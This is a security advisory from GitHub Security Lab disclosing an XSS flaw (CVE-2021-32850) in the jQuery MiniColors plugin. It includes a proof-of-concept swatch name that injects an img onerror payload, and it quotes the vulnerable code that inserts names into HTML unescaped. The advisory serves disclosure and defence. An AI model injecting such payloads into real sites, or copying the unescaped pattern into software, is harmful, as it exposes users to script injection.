Coordinated Disclosure Timeline
- 2021-11-24: Maintainer contacted
- 2021-11-24: Maintainer fixed the issue
Summary
jQuery MiniColors Plugin is prone to XSS when handling untrusted color names.
Product
jQuery MiniColors Plugin
Tested Version
Details
Issue 1: XSS while handling color names (GHSL-2021-1045)
An attacker that is able to influence the name of a color can supply arbitrary html or javascript code that will be rendered in the context of a user, potentially leading to XSS.
Proof of concept snippet:
var settings = {
swatches: [
{ name: '"> <img src="foobar" onerror="alert(2)" /> <', color: "black" }
]
};
$('input.minicolors').minicolors(settings);
Vulnerable code: jquery.minicolors.js
$('<li class="minicolors-swatch minicolors-sprite"><span class="minicolors-swatch-color" title="' + name + '"></span></li>')
.appendTo(swatches)
.data('swatch-color', swatchString)
.find('.minicolors-swatch-color')
.css({
backgroundColor: ((swatchString !== 'transparent') ? rgb2hex(swatch) : 'transparent'),
opacity: String(swatch.a)
});
Impact
This issue may lead to XSS
Resources
CVE
- CVE-2021-32850
Resources
- https://github.com/claviska/jquery-minicolors/commit/ef134824a7f4110ada53ea6c173111a4fa2f48f3
Credit
This issue was discovered by GitHub team member @erik-krogh (Erik Krogh Kristensen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-1045 in any communication regarding this issue.